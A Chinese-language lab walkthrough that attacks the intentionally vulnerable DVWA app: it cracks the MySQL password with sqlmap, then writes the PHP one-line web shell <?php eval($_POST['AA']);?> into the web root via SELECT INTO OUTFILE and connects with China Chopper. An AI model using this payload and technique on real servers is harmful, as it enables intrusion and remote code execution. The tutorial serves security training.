sqlmap的使用和mysql的入侵

Dvwa简介

Dvwa是脆弱Web应用程序(DVWA)是一个PHP / MySQL Web应用程序,该应用程序非常脆弱。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地理解保护Web应用程序的过程,并帮助教师/学生在课堂环境中教授/学习Web应用程序安全。

前期准备

环境:phpstudy2016
攻击机:win10
打开dvwa主页,其默认的用户名和密码为admin和admin登陆,找到sql注入

开始

首先利用抓包工具进行抓包
sqlmap的使用和mysql的入侵
把带有参数的数据包保存放入sqlmap的主目录下。
sqlmap的使用和mysql的入侵
用 -r 加载我们的数据包 --password进行**数据库密码
sqlmap的使用和mysql的入侵
如果出先下图所示,即加载成功,它会检测其是否存在sql注入,并**密码
sqlmap的使用和mysql的入侵
可以看到我们以及把数据库密码**出来
用户名:root 密码为:空(直接弱口令----)
sqlmap的使用和mysql的入侵
然后通过远程连接链接数据库
可以看到成功链接,并能进行数据库查询(查看数据库和数据版本)
sqlmap的使用和mysql的入侵
利用show global variables like ‘%secure%’;命令显示数据库允许导出数据的目录。在我这是任意目录
然后选择一个数据库
Create table php(php text);我们创建了一个新的表,表名为php,表中只存放一个字段,字段名为php,为text文本。
Insert into php values(“<?php eval($_POST['AA']);?>”);给创建的php表中插入数据
然后可以查看我们创建的PHP表中的内容
Select * from php;可以看到是菜刀一句话<?php eval($_POST['AA']);?>
select * from php into outfile “D:\phpStudy\WWW\shell.php”;利用数据库包其导出到web根目录
sqlmap的使用和mysql的入侵
这样我们的shell.php一句话就制作完成
利用菜刀尝试连接,果然链接成功
sqlmap的使用和mysql的入侵